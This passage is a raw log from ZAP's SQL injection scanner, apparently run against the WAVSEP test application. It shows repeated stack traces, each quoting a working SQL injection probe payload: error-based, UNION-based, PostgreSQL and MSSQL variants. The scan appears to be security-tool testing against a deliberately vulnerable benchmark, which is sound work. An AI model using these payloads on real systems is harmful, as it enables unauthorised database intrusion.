[172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 3549 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3549=3549,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 3549 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3549=3549,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679850 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679850 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9679851 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9228=9228,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- xRko] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9228=9228,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- xRko at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679852 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9645=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9645=9645) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (4614=4614] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9645=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9645=9645) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (4614=4614 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679855 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4298=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4298=4298) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4298=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4298=4298) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679859 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2794=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2794=2794) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('LEzS'='LEzS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2794=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (2794=2794) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('LEzS'='LEzS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679860 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9093=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9093=9093) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'zWQw'='zWQw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9093=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9093=9093) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'zWQw'='zWQw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679861 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8030=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8030=8030) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8030=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8030=8030) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679862 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3837=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3837=3837) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- nfLX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3837=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3837=3837) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- nfLX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679864 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 3666=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3666=3666) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (5091=5091] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 3666=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (3666=3666) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (5091=5091 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679865 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5626=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5626=5626) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 5626=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5626=5626) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679866 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9127=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9127=9127) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('HGKQ'='HGKQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9127=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (9127=9127) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('HGKQ'='HGKQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 